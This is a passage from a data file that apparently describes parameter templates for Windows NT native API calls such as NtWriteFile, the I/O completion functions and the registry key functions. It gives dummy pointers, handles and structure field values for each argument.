None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Length (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct176\",\r\n \"structureValueExpectations\": \"Length of region to unlock.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ByteOffset (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct177\",\r\n \"structureValueExpectations\": \"Starting offset of region to unlock.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct178\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000446\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct176\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000001000\",\r\n \"fieldComment\": \"Length: 4096 bytes\"\r\n }\r\n ]\r\n },\r\n \"struct177\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Offset: start of file\"\r\n }\r\n ]\r\n },\r\n \"struct178\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (success)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"Number of bytes processed\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtWriteFile\": {\r\n \"ntFunc\": \"NtWriteFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ULONG Key (dummy pointer, optional, usually None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ByteOffset (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct179\",\r\n \"structureValueExpectations\": \"Offset in file to write.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"Length: 16 bytes\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00a0\"\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct180\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcContext: None (no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcRoutine: None (no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Event: None (no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000447\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct179\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000020\",\r\n \"fieldComment\": \"Offset: 32 bytes into file\"\r\n }\r\n ]\r\n },\r\n \"struct180\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (success)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"Number of bytes written\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtWriteFileGather\": {\r\n \"ntFunc\": \"NtWriteFileGather\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to ULONG Key (dummy pointer, optional, usually None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER ByteOffset (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct181\",\r\n \"structureValueExpectations\": \"Offset in file to write.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"Length: 32 bytes\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to FILE_SEGMENT_ELEMENT array (dummy pointer)\",\r\n \"structurePointer\": \"FILE_SEGMENT_ELEMENT\",\r\n \"structureRef\": \"struct182\",\r\n \"structureValueExpectations\": \"Array of segment elements for scatter/gather I/O.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct183\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcContext: None (no APC context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ApcRoutine: None (no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Event: None (no event)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000448\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct181\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000040\",\r\n \"fieldComment\": \"Offset: 64 bytes into file\"\r\n }\r\n ]\r\n },\r\n \"struct182\": {\r\n \"type\": \"FILE_SEGMENT_ELEMENT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0xbadd0100\",\r\n \"fieldComment\": \"Pointer to buffer segment (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct183\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (success)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Number of bytes written\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateIoCompletion\": {\r\n \"ntFunc\": \"NtCreateIoCompletion\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"ULONG NumberOfConcurrentThreads (default: 4)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed completion port)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (IO_COMPLETION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PHANDLE IoCompletionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenIoCompletion\": {\r\n \"ntFunc\": \"NtOpenIoCompletion\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, typical for unnamed completion port)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (IO_COMPLETION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PHANDLE IoCompletionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryIoCompletion\": {\r\n \"ntFunc\": \"NtQueryIoCompletion\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PULONG RequiredLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG InformationBufferLength (32 bytes, typical for IO_COMPLETION_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PVOID IoCompletionInformation (dummy pointer to output buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"IO_COMPLETION_INFORMATION_CLASS InformationClass (IoCompletionBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRemoveIoCompletion\": {\r\n \"ntFunc\": \"NtRemoveIoCompletion\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Timeout (None, wait indefinitely)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PULONG CompletionValue (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"PULONG CompletionKey (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE IoCompletionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCompactKeys\": {\r\n \"ntFunc\": \"NtCompactKeys\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"HANDLE KeysArray[] (dummy pointer to array of handles)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00004444\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG NrOfKeys (2 keys in array)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCompressKey\": {\r\n \"ntFunc\": \"NtCompressKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE Key (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateKey\": {\r\n \"ntFunc\": \"NtCreateKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG Disposition (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"CreateOptions (REG_OPTION_NON_VOLATILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Class (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct184\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the class of the key, often None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TitleIndex (usually 0, reserved)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct185\",\r\n \"structureValueExpectations\": \"Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000f003f\",\r\n \"additionalComment\": \"DesiredAccess (KEY_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct184\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero length (None class)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero max length (None class)\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None pointer (no class string)\"\r\n }\r\n ]\r\n },\r\n \"struct185\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0080\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeleteKey\": {\r\n \"ntFunc\": \"NtDeleteKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDeleteValueKey\": {\r\n \"ntFunc\": \"NtDeleteValueKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ValueName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct186\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the value name to delete.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct186\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"16 bytes (8 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes (16 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to value name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtEnumerateKey\": {\r\n \"ntFunc\": \"NtEnumerateKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000030\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"Length (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to buffer for KeyInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0070\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"KeyInformationClass (KeyNodeInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Index (first key, 0-based)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtEnumerateValueKey\": {\r\n \"ntFunc\": \"NtEnumerateValueKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer for KeyValueInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0100\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"KeyValueInformationClass = KeyValueFullInformation\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Index (first value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFlushKey\": {\r\n \"ntFunc\": \"NtFlushKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLoadKey\": {\r\n \"ntFunc\": \"NtLoadKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES HiveFileName (dummy pointer, typically non-None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct187\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES DestinationKeyName (dummy pointer, typically non-None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct188\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct187\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00a0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n },\r\n \"struct188\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd00b0\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n 